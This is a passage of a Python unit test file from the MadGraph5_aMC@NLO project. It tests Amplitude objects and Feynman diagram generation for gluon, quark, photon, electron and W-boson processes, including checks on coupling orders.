# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
"""Unit test library for the various base objects of the core library"""
from __future__ import absolute_import
import copy
import itertools
import logging
import math
import tests.unit_tests as unittest
import madgraph.core.base_objects as base_objects
import madgraph.core.diagram_generation as diagram_generation
import models.import_ufo as import_ufo
from madgraph import MadGraph5Error, InvalidCmd
from six.moves import range
from six.moves import zip
#===============================================================================
# AmplitudeTest
#===============================================================================
class AmplitudeTest(unittest.TestCase):
"""Test class for routine functions of the Amplitude object"""
mydict = {}
myamplitude = None
myleglist = base_objects.LegList([base_objects.Leg({'id':3,
'number':5,
'state':True,
'from_group':False})] * 10)
myvertexlist = base_objects.VertexList([base_objects.Vertex({'id':3,
'legs':myleglist})] * 10)
mydiaglist = base_objects.DiagramList([base_objects.Diagram(\
{'vertices':myvertexlist})] * 100)
myprocess = base_objects.Process()
def setUp(self):
self.mydict = {'diagrams':self.mydiaglist, 'process':self.myprocess,
'has_mirror_process': False}
self.myamplitude = diagram_generation.Amplitude(self.mydict)
def test_setget_amplitude_correct(self):
"Test correct Amplitude object __init__, get and set"
myamplitude2 = diagram_generation.Amplitude()
for prop in self.mydict.keys():
myamplitude2.set(prop, self.mydict[prop])
self.assertEqual(self.myamplitude, myamplitude2)
for prop in self.myamplitude.keys():
self.assertEqual(self.myamplitude.get(prop), self.mydict[prop])
def test_setget_amplitude_exceptions(self):
"Test error raising in Amplitude __init__, get and set"
wrong_dict = self.mydict
wrong_dict['wrongparam'] = 'wrongvalue'
a_number = 0
# Test init
self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
diagram_generation.Amplitude,
wrong_dict)
self.assertRaises(AssertionError,
diagram_generation.Amplitude,
a_number)
# Test get
self.assertRaises(AssertionError,
self.myamplitude.get,
a_number)
self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
self.myamplitude.get,
'wrongparam')
# Test set
self.assertRaises(AssertionError,
self.myamplitude.set,
a_number, 0)
self.assertRaises(diagram_generation.Amplitude.PhysicsObjectError,
self.myamplitude.set,
'wrongparam', 0)
def test_values_for_prop(self):
"""Test filters for amplitude properties"""
test_values = [{'prop':'diagrams',
'right_list':[self.mydiaglist],
'wrong_list':['a', {}]}
]
temp_amplitude = self.myamplitude
for test in test_values:
for x in test['right_list']:
self.assert_(temp_amplitude.set(test['prop'], x))
for x in test['wrong_list']:
self.assertFalse(temp_amplitude.set(test['prop'], x))
def test_representation(self):
"""Test amplitude object string representation."""
goal = "{\n"
goal = goal + " \'process\': %s,\n" % repr(self.myprocess)
goal = goal + " \'diagrams\': %s,\n" % repr(self.mydiaglist)
goal = goal + " \'has_mirror_process\': False\n}"
self.assertEqual(goal, str(self.myamplitude))
#===============================================================================
# DiagramGenerationTest
#===============================================================================
class DiagramGenerationTest(unittest.TestCase):
"""Test class for all functions related to the diagram generation"""
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
mymodel = base_objects.Model()
myprocess = base_objects.Process()
ref_dict_to0 = {}
ref_dict_to1 = {}
myamplitude = diagram_generation.Amplitude()
def setUp(self):
# A gluon
self.mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A quark U and its antiparticle
self.mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antiu = copy.copy(self.mypartlist[1])
antiu.set('is_part', False)
# A quark D and its antiparticle
self.mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antid = copy.copy(self.mypartlist[2])
antid.set('is_part', False)
# A photon
self.mypartlist.append(base_objects.Particle({'name':'a',
'antiname':'a',
'spin':3,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'\gamma',
'antitexname':'\gamma',
'line':'wavy',
'charge':0.,
'pdg_code':22,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A electron and positron
self.mypartlist.append(base_objects.Particle({'name':'e+',
'antiname':'e-',
'spin':2,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'e^+',
'antitexname':'e^-',
'line':'straight',
'charge':-1.,
'pdg_code':11,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antie = copy.copy(self.mypartlist[4])
antie.set('is_part', False)
# 3 gluon vertex
self.myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[self.mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
# 4 gluon vertex
self.myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[self.mypartlist[0]] * 4),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G^2'},
'orders':{'QCD':2}}))
# Gluon and photon couplings to quarks
self.myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[self.mypartlist[1], \
antiu, \
self.mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[self.mypartlist[1], \
antiu, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 5,
'particles': base_objects.ParticleList(\
[self.mypartlist[2], \
antid, \
self.mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 6,
'particles': base_objects.ParticleList(\
[self.mypartlist[2], \
antid, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of e to gamma
self.myinterlist.append(base_objects.Interaction({
'id': 7,
'particles': base_objects.ParticleList(\
[self.mypartlist[4], \
antie, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.mymodel.set('particles', self.mypartlist)
self.mymodel.set('interactions', self.myinterlist)
self.ref_dict_to0 = self.myinterlist.generate_ref_dict()[0]
self.ref_dict_to1 = self.myinterlist.generate_ref_dict()[1]
def test_combine_legs_gluons(self):
"""Test combine_legs and merge_comb_legs: gg>gg"""
# Four gluon legs with two initial state
myleglist = base_objects.LegList([base_objects.Leg({'id':21,
'number':num,
'state':True}) \
for num in range(1, 5)])
myleglist[0].set('state', False)
myleglist[1].set('state', False)
l1 = myleglist[0]
l2 = myleglist[1]
l3 = myleglist[2]
l4 = myleglist[3]
# All possibilities for the first combination
goal_combined_legs = [
[(l1, l2), l3, l4], [(l1, l2), (l3, l4)],
[(l1, l3), l2, l4], [(l1, l3), (l2, l4)],
[(l1, l4), l2, l3], [(l1, l4), (l2, l3)],
[l1, (l2, l3), l4], [l1, (l2, l4), l3], [l1, l2, (l3, l4)],
[(l1, l2, l3), l4], [(l1, l2, l4), l3],
[(l1, l3, l4), l2], [l1, (l2, l3, l4)]
]
combined_legs = self.myamplitude.combine_legs(
[leg for leg in myleglist],
self.ref_dict_to1,
3)
self.assertEqual(combined_legs, goal_combined_legs)
# Now test the reduction of legs for this
reduced_list = self.myamplitude.merge_comb_legs(combined_legs,
self.ref_dict_to1)
# Remaining legs should be from_group False
l1.set('from_group', False)
l2.set('from_group', False)
l3.set('from_group', False)
l4.set('from_group', False)
# Define all possible legs obtained after merging combinations
l12 = base_objects.Leg({'id':21,
'number':1,
'state':True})
l13 = base_objects.Leg({'id':21,
'number':1,
'state':False})
l14 = base_objects.Leg({'id':21,
'number':1,
'state':False})
l23 = base_objects.Leg({'id':21,
'number':2,
'state':False})
l24 = base_objects.Leg({'id':21,
'number':2,
'state':False})
l34 = base_objects.Leg({'id':21,
'number':3,
'state':True})
l123 = base_objects.Leg({'id':21,
'number':1,
'state':True})
l124 = base_objects.Leg({'id':21,
'number':1,
'state':True})
l134 = base_objects.Leg({'id':21,
'number':1,
'state':False})
l234 = base_objects.Leg({'id':21,
'number':2,
'state':False})
# Associated vertices
vx12 = base_objects.Vertex({'legs':base_objects.LegList([l1, l2, l12]), 'id': 1})
vx13 = base_objects.Vertex({'legs':base_objects.LegList([l1, l3, l13]), 'id': 1})
vx14 = base_objects.Vertex({'legs':base_objects.LegList([l1, l4, l14]), 'id': 1})
vx23 = base_objects.Vertex({'legs':base_objects.LegList([l2, l3, l23]), 'id': 1})
vx24 = base_objects.Vertex({'legs':base_objects.LegList([l2, l4, l24]), 'id': 1})
vx34 = base_objects.Vertex({'legs':base_objects.LegList([l3, l4, l34]), 'id': 1})
vx123 = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l2, l3, l123]), 'id': 2})
vx124 = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l2, l4, l124]), 'id': 2})
vx134 = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l3, l4, l134]), 'id': 2})
vx234 = base_objects.Vertex(
{'legs':base_objects.LegList([l2, l3, l4, l234]), 'id': 2})
# The final object which should be produced by merge_comb_legs
goal_reduced_list = [\
(base_objects.LegList([l12, l3, l4]), \
base_objects.VertexList([vx12])), \
(base_objects.LegList([l12, l34]), \
base_objects.VertexList([vx12, \
vx34])), \
(base_objects.LegList([l13, l2, l4]), \
base_objects.VertexList([vx13])), \
(base_objects.LegList([l13, l24]), \
base_objects.VertexList([vx13, \
vx24])), \
(base_objects.LegList([l14, l2, l3]), \
base_objects.VertexList([vx14])), \
(base_objects.LegList([l14, l23]), \
base_objects.VertexList([vx14, \
vx23])), \
(base_objects.LegList([l1, l23, l4]), \
base_objects.VertexList([vx23])), \
(base_objects.LegList([l1, l24, l3]), \
base_objects.VertexList([vx24])), \
(base_objects.LegList([l1, l2, l34]), \
base_objects.VertexList([vx34])), \
(base_objects.LegList([l123, l4]), \
base_objects.VertexList([vx123])), \
(base_objects.LegList([l124, l3]), \
base_objects.VertexList([vx124])), \
(base_objects.LegList([l134, l2]), \
base_objects.VertexList([vx134])), \
(base_objects.LegList([l1, l234]), \
base_objects.VertexList([vx234])), \
]
self.assertEqual(reduced_list, goal_reduced_list)
def test_combine_legs_uux_ddx(self):
"""Test combine_legs and merge_comb_legs: uu~>dd~"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-2,
'number':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'number':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'number':3,
'state':True}))
myleglist.append(base_objects.Leg({'id':-1,
'number':4,
'state':True}))
l1 = myleglist[0]
l2 = myleglist[1]
l3 = myleglist[2]
l4 = myleglist[3]
my_combined_legs = [\
[(l1, l2), l3, l4], [(l1, l2), (l3, l4)], \
[l1, l2, (l3, l4)] \
]
combined_legs = self.myamplitude.combine_legs(
[leg for leg in myleglist],
self.ref_dict_to1, 3)
self.assertEqual(combined_legs, my_combined_legs)
reduced_list = self.myamplitude.merge_comb_legs(combined_legs,
self.ref_dict_to1)
l1.set('from_group', False)
l2.set('from_group', False)
l3.set('from_group', False)
l4.set('from_group', False)
l12glue = base_objects.Leg({'id':21,
'number':1,
'state':True})
l12phot = base_objects.Leg({'id':22,
'number':1,
'state':True})
l34glue = base_objects.Leg({'id':21,
'number':3,
'state':True})
l34phot = base_objects.Leg({'id':22,
'number':3,
'state':True})
vx12glue = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l2, l12glue]), 'id':3})
vx12phot = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l2, l12phot]), 'id':4})
vx34glue = base_objects.Vertex(
{'legs':base_objects.LegList([l3, l4, l34glue]), 'id':5})
vx34phot = base_objects.Vertex(
{'legs':base_objects.LegList([l3, l4, l34phot]), 'id':6})
my_reduced_list = [\
(base_objects.LegList([l12glue, l3, l4]),
base_objects.VertexList([vx12glue])),
(base_objects.LegList([l12phot, l3, l4]),
base_objects.VertexList([vx12phot])),
(base_objects.LegList([l12glue, l34glue]),
base_objects.VertexList([vx12glue, vx34glue])),
(base_objects.LegList([l12glue, l34phot]),
base_objects.VertexList([vx12glue, vx34phot])),
(base_objects.LegList([l12phot, l34glue]),
base_objects.VertexList([vx12phot, vx34glue])),
(base_objects.LegList([l12phot, l34phot]),
base_objects.VertexList([vx12phot, vx34phot])),
(base_objects.LegList([l1, l2, l34glue]),
base_objects.VertexList([vx34glue])),
(base_objects.LegList([l1, l2, l34phot]),
base_objects.VertexList([vx34phot])),
]
self.assertEqual(reduced_list, my_reduced_list)
def test_combine_legs_uux_uuxuux(self):
"""Test combine_legs: uu~>uu~uu~"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-2,
'number':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'number':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'number':3,
'state':True}))
myleglist.append(base_objects.Leg({'id':-2,
'number':4,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'number':5,
'state':True}))
myleglist.append(base_objects.Leg({'id':-2,
'number':6,
'state':True}))
l1 = myleglist[0]
l2 = myleglist[1]
l3 = myleglist[2]
l4 = myleglist[3]
l5 = myleglist[4]
l6 = myleglist[5]
my_combined_legs = [\
[(l1, l2), l3, l4, l5, l6], [(l1, l2), (l3, l4), l5, l6],
[(l1, l2), (l3, l4), (l5, l6)], [(l1, l2), (l3, l6), l4, l5],
[(l1, l2), (l3, l6), (l4, l5)], [(l1, l2), l3, (l4, l5), l6],
[(l1, l2), l3, l4, (l5, l6)],
[(l1, l3), l2, l4, l5, l6], [(l1, l3), (l2, l4), l5, l6],
[(l1, l3), (l2, l4), (l5, l6)], [(l1, l3), (l2, l6), l4, l5],
[(l1, l3), (l2, l6), (l4, l5)], [(l1, l3), l2, (l4, l5), l6],
[(l1, l3), l2, l4, (l5, l6)],
[(l1, l5), l2, l3, l4, l6], [(l1, l5), (l2, l4), l3, l6],
[(l1, l5), (l2, l4), (l3, l6)], [(l1, l5), (l2, l6), l3, l4],
[(l1, l5), (l2, l6), (l3, l4)], [(l1, l5), l2, (l3, l4), l6],
[(l1, l5), l2, (l3, l6), l4],
[l1, (l2, l4), l3, l5, l6], [l1, (l2, l4), (l3, l6), l5],
[l1, (l2, l4), l3, (l5, l6)],
[l1, (l2, l6), l3, l4, l5], [l1, (l2, l6), (l3, l4), l5],
[l1, (l2, l6), l3, (l4, l5)],
[l1, l2, (l3, l4), l5, l6], [l1, l2, (l3, l4), (l5, l6)],
[l1, l2, (l3, l6), l4, l5], [l1, l2, (l3, l6), (l4, l5)],
[l1, l2, l3, (l4, l5), l6],
[l1, l2, l3, l4, (l5, l6)]
]
combined_legs = self.myamplitude.combine_legs(
[leg for leg in myleglist],
self.ref_dict_to1, 3)
self.assertEqual(combined_legs, my_combined_legs)
def test_diagram_generation_gluons(self):
"""Test the number of diagram generated for gg>ng with n up to 4"""
goal_ndiags = [1, 4, 25, 220, 2485, 34300]
# Test 1,2,3 and 4 gluons in the final state
for ngluon in range (1, 4):
# Create the amplitude
myleglist = base_objects.LegList([base_objects.Leg({'id':21,
'state':False})] * 2)
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluon)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QCD':ngluon},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d gluons: %d" % (ngluon,
ndiags))
self.assertEqual(ndiags, goal_ndiags[ngluon - 1])
def test_diagram_generation_uux_gg(self):
"""Test the number of diagram generated for uu~>gg (s, t and u channels)
"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')), 3)
def test_diagram_generation_uux_uuxng(self):
"""Test the number of diagram generated for uu~>uu~+ng with n up to 2
"""
goal_ndiags = [4, 18, 120, 1074, 12120]
for ngluons in range(0, 3):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags[ngluons])
def test_diagram_generation_uux_ddxng(self):
"""Test the number of diagram generated for uu~>dd~+ng with n up to 2
"""
goal_ndiags = [2, 9, 60, 537, 6060]
for ngluons in range(0, 3):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags[ngluons])
def test_diagram_generation_diagrams_ddx_uuxg(self):
"""Test the vertex list output for dd~>uu~g (so far only 2
diagrams, due to lack of time)
"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False,
'number': 1}))
myleglist.append(base_objects.Leg({'id':-1,
'state':False,
'number': 2}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True,
'number': 3}))
myleglist.append(base_objects.Leg({'id':2,
'state':True,
'number': 4}))
myleglist.append(base_objects.Leg({'id':21,
'state':True,
'number': 5}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
mydiagrams = self.myamplitude.get('diagrams')
for leg in myleglist:
leg.set('from_group', True)
l1 = myleglist[0]
l2 = myleglist[1]
l3 = myleglist[2]
l4 = myleglist[3]
l5 = myleglist[4]
l1.set('id',
self.mymodel.get('particle_dict')[l1.get('id')].get_anti_pdg_code())
l2.set('id',
self.mymodel.get('particle_dict')[l2.get('id')].get_anti_pdg_code())
l12glue = base_objects.Leg({'id':21,
'number':1,
'state':True})
l34glue = base_objects.Leg({'id':21,
'number':3,
'state':True})
l35 = base_objects.Leg({'id':-2,
'number':3,
'state':True})
vx12glue = base_objects.Vertex(
{'legs':base_objects.LegList([l1, l2, l12glue]), 'id':5})
vx34glue = base_objects.Vertex(
{'legs':base_objects.LegList([l3, l4, l34glue]), 'id':3})
vx12glue34glue5 = base_objects.Vertex(
{'legs':base_objects.LegList([l12glue, l34glue, l5]), 'id':1})
vx35 = base_objects.Vertex(
{'legs':base_objects.LegList([l3, l5, l35]), 'id':3})
vx12glue354 = base_objects.Vertex(
{'legs':base_objects.LegList([l12glue, l35, l4]), 'id':3})
goaldiagrams = base_objects.DiagramList([\
base_objects.Diagram({'vertices': base_objects.VertexList(\
[vx12glue, vx34glue, vx12glue34glue5]),
'orders':{'QED':0, 'QCD':3, 'WEIGHTED':3}}),
base_objects.Diagram({'vertices': base_objects.VertexList(\
[vx12glue, vx35, vx12glue354]),
'orders':{'QED':0, 'QCD':3, 'WEIGHTED':3}})\
])
for diagram in mydiagrams:
for vertex in diagram.get('vertices'):
for leg in vertex.get('legs'):
leg.set('from_group', True)
self.assertEqual(goaldiagrams[0:2], mydiagrams[0:2])
def test_diagram_generation_nodiag(self):
"""Test charge violating processes give 0 diagram
"""
for nquarks in range(1, 5):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':1,
'state':True})] * nquarks)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
self.myamplitude.set('process', myproc)
self.assertRaises(InvalidCmd, self.myamplitude.generate_diagrams)
self.assertEqual(len(self.myamplitude.get('diagrams')), 0)
def test_diagram_generation_photons(self):
"""Test the number of diagram generated for uu~>na with n up to 6"""
# Test up to 5 photons in the final state
for nphot in range (1, 5):
# Create the amplitude
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.extend([base_objects.Leg({'id':22,
'state':True})] * nphot)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QED':nphot},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d photons: %d" % (nphot,
ndiags))
self.assertEqual(ndiags, math.factorial(nphot))
def test_diagram_generation_electrons(self):
"""Test the number of diagram generated for e+e->n(e+e-) with n up to 3
"""
goal_ndiags = [2, 36, 1728]
for npairs in range (1, 3):
# Create the amplitude
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-11,
'state':False}))
myleglist.append(base_objects.Leg({'id':11,
'state':False}))
myleglist.extend([base_objects.Leg({'id':11,
'state':True}),
base_objects.Leg({'id':-11,
'state':True})] * npairs)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QED':npairs * 2},
'model':self.mymodel})
self.myamplitude.set('process', myproc)
# Call generate_diagram and output number of diagrams
self.myamplitude.generate_diagrams()
ndiags = len(self.myamplitude.get('diagrams'))
logging.debug("Number of diagrams for %d electron pairs: %d" % \
(npairs, ndiags))
self.assertEqual(ndiags, goal_ndiags[npairs - 1])
def test_expand_list(self):
"""Test the expand_list function"""
mylist = [[1, 2], 3, [4, 5]]
goal_list = [[1, 3, 4], [1, 3, 5], [2, 3, 4], [2, 3, 5]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
# Also test behavior with singlets like [1]
mylist = [1, [2]]
goal_list = [[1, 2]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
mylist = [[1]]
self.assertEqual(diagram_generation.expand_list(mylist), mylist)
mylist = [[1, 2], [3]]
goal_list = [[1, 3], [2, 3]]
self.assertEqual(diagram_generation.expand_list(mylist), goal_list)
def test_expand_list_list(self):
"""Test the expand_list_list function"""
mylist = [ [1, 2], [[3, 4], [5, 6]] ]
goal_list = [[1, 2, 3, 4], [1, 2, 5, 6]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [5] ]
goal_list = [[1, 2, 5], [3, 4, 5]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [[6, 7], [8, 9]] ]
goal_list = [[1, 2, 6, 7], [1, 2, 8, 9], [3, 4, 6, 7], [3, 4, 8, 9]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
mylist = [ [[1, 2], [3, 4]], [5], [[6, 7], [8, 9]] ]
goal_list = [[1, 2, 5, 6, 7], [1, 2, 5, 8, 9], [3, 4, 5, 6, 7],
[3, 4, 5, 8, 9]]
self.assertEqual(diagram_generation.expand_list_list(mylist), goal_list)
def test_diagram_generation_ue_dve(self):
"""Test the number of diagram generated for ue->dve (t channel)
"""
mypartlist = base_objects.ParticleList();
myinterlist = base_objects.InteractionList();
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
u = mypartlist[len(mypartlist) - 1]
antiu = copy.copy(u)
antiu.set('is_part', False)
# A quark D and its antiparticle
mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
d = mypartlist[len(mypartlist) - 1]
antid = copy.copy(d)
antid.set('is_part', False)
# A electron and positron
mypartlist.append(base_objects.Particle({'name':'e+',
'antiname':'e-',
'spin':2,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'e^+',
'antitexname':'e^-',
'line':'straight',
'charge':-1.,
'pdg_code':11,
'propagating':True,
'is_part':True,
'self_antipart':False}))
eminus = mypartlist[len(mypartlist) - 1]
eplus = copy.copy(eminus)
eplus.set('is_part', False)
# nu_e
mypartlist.append(base_objects.Particle({'name':'ve',
'antiname':'ve~',
'spin':2,
'color':0,
'mass':'zero',
'width':'zero',
'texname':'\nu_e',
'antitexname':'\bar\nu_e',
'line':'straight',
'charge':0.,
'pdg_code':12,
'propagating':True,
'is_part':True,
'self_antipart':False}))
nue = mypartlist[len(mypartlist) - 1]
nuebar = copy.copy(nue)
nuebar.set('is_part', False)
# W
mypartlist.append(base_objects.Particle({'name':'w+',
'antiname':'w-',
'spin':3,
'color':0,
'mass':'WMASS',
'width':'WWIDTH',
'texname':'W^+',
'antitexname':'W^-',
'line':'wavy',
'charge':1.,
'pdg_code':24,
'propagating':True,
'is_part':True,
'self_antipart':False}))
wplus = mypartlist[len(mypartlist) - 1]
wminus = copy.copy(wplus)
wminus.set('is_part', False)
# Coupling of u and d to W
myinterlist.append(base_objects.Interaction({
'id': 8,
'particles': base_objects.ParticleList(\
[antid, \
u, \
wminus]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of d and u to W
myinterlist.append(base_objects.Interaction({
'id': 9,
'particles': base_objects.ParticleList(\
[antiu, \
d, \
wplus]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of e- and nu_e to W
myinterlist.append(base_objects.Interaction({
'id': 10,
'particles': base_objects.ParticleList(\
[nuebar, \
eminus, \
wplus]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of nu_e and e+ to W
myinterlist.append(base_objects.Interaction({
'id': 11,
'particles': base_objects.ParticleList(\
[eplus, \
nue, \
wminus]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
mymodel = base_objects.Model()
mymodel.set('particles', mypartlist)
mymodel.set('interactions', myinterlist)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':11,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':12,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':mymodel})
myamplitude = diagram_generation.Amplitude()
myamplitude.set('process', myproc)
self.assertEqual(len(myamplitude.get('diagrams')), 1)
def test_coupling_orders_uux_ddxng(self):
"""Test the number of diagrams uu~>dd~+ng with different QCD
and QED coupling orders
"""
goal_ndiags20 = [1, 0, 0]
goal_ndiags02 = [1, 0, 0]
goal_ndiags21 = [1, 4, 0]
goal_ndiags22 = [2, 4, 24]
goal_ndiags04 = [1, 5, 36]
for ngluons in range(0, 3):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': {'QED':2, 'QCD':0}})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags20[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': {'QED':0, 'QCD':2}})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags02[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': {'QED':2, 'QCD':1}})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags21[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': {'QED':2, 'QCD':2}})
